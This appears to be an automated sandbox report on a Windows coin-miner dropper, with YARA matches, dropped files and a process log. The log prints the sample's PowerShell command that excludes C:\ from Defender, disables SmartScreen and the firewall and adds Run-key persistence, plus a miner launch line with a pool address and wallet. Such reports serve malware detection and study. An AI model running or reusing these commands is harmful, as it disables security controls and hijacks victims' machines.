Source: 00000041.00000003.407789264.0000000001A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000046.00000003.440830795.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 0000003B.00000003.390797612.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000003F.00000002.419246767.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000045.00000002.435209850.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 0000002C.00000002.380547096.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000046.00000002.444541344.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 0000003F.00000003.405780371.0000000003011000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000041.00000002.421739759.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 0000003B.00000002.404252573.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: Process Memory Space: procexp.exe PID: 6356, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: procexp.exe PID: 6356, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: UpSys.exe PID: 6748, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Windows\Temp\uvbddbm, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Users\user\AppData\Local\Temp\ygufeko, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Users\user\AppData\Local\Temp\bjnqnwl, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Windows\Temp\unmloyr, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Windows\Temp\klcxefr, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\Windows\Temp\rngmakf, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: C:\ProgramData\MicrosoftNetwork\System.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\ProgramData\Systemd\procexp.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\ProgramData\Systemd\procexp.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\ProgramData\UpSys.exeFile deleted: C:\Windows\Temp\aut3E26.tmp
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400407D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,44_2_00000001400407D0
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\ProgramData\UpSys.exeCode function: String function: 0000000140016ED8 appears 32 times
Source: C:\ProgramData\UpSys.exeCode function: String function: 00000001400526A0 appears 66 times
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014003EC70: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,44_2_000000014003EC70
Source: DllHost.exe, 00000000.00000003.269351525.00000208C9794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerRun.exe, vs DllHost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: SecurityJump to behavior
Source: DllHost.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: exe.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\MicrosoftNetwork\System.exe
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AZQSKQ2F.txtJump to behavior
Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@151/59@6/7
Source: C:\Users\user\Desktop\DllHost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140058E50 GetLastError,FormatMessageW,44_2_0000000140058E50
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191B6EB0 SHGetSpecialFolderPathW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,lstrcatW,CreateFileW,WriteFile,CloseHandle,CoInitializeEx,CoCreateInstance,lstrlenW,lstrlenW,DeleteFileW,0_2_00007FF7191B6EB0
Source: DllHost.exeVirustotal: Detection: 19%
Source: C:\Users\user\Desktop\DllHost.exeFile read: C:\Users\user\Desktop\DllHost.exeJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\DllHost.exe "C:\Users\user\Desktop\DllHost.exe"
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\ProgramData\Systemd\procexp.exe --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
Source: unknownProcess created: C:\ProgramData\MicrosoftNetwork\System.exe "C:\ProgramData\MicrosoftNetwork\System.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 528 -p 4352 -ip 4352
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6616 -s 2172
Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4352 -s 2560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
